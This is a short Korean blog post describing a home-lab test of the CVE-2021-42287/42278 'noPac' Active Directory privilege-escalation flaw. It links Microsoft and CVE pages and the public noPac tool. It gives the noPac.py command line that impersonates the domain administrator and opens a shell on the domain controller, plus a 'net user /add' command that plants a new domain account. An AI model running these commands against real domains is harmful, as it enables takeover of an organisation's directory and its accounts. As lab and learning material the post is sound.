보안/KaliLinux

칼리 리눅스 CVE-2021-42287 취약점 실습

lowcodingpython 2022. 2. 24. 03:40
반응형

Active Directory 도메인 서비스 권한 상승 취약점 

공격자가 일반 사용자의 권한을 도메인 관리자로 상승시켜 Active Directory 및 도메인을 제어하고, 사용자를 삭제 또는 생성하고, 원하는 모든 작업을 수행할 수 있도록 하는 심각한 Windows 취약점

 

KB5008380—인증 업데이트(CVE-2021-42287)

요약 CVE-2021-42287은 PAC(Kerberos Privilege Attribute Certificate)에 영향을 주는 보안 우회 취약성을 해결하고 잠재적 공격자가 도메인 컨트롤러를 가장할 수 있습니다. 이 취약성을 악용하려면 손상된 도

support.microsoft.com

메인

 

CVE-2021-42287 : Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278

Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291. Publish Date : 2021-11-10 Last Update Date : 2021-11-13 - CVSS Scores & Vulnerability Types CVSS Score 6.5 Conf

www.cvedetails.com

 

AD 구성후 사용자 test 계정을 하나 만들겠습니다. 

사용자-이름사용자-비밀번호

 

 

GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user - GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domai...

github.com

nopac-설치

#python3 noPac.py DOMAIN/USERNAME:'PASSWORD' -dc-ip "AD서버 IP" -shell --impersonate administrato -use-ldap

 

noPac-명령어

쉽게 AD서버로 접근이 가능합니다.

noPac를 사용하면 취약점에 좀 더 쉽게 접근하실 수 있습니다.

net user /add fake abc@123456 /domain 

이름 fake 비밀번호 

명령어를 입력 시 오른쪽 사진처럼 사용자가 생성이 됩니다.

 

반응형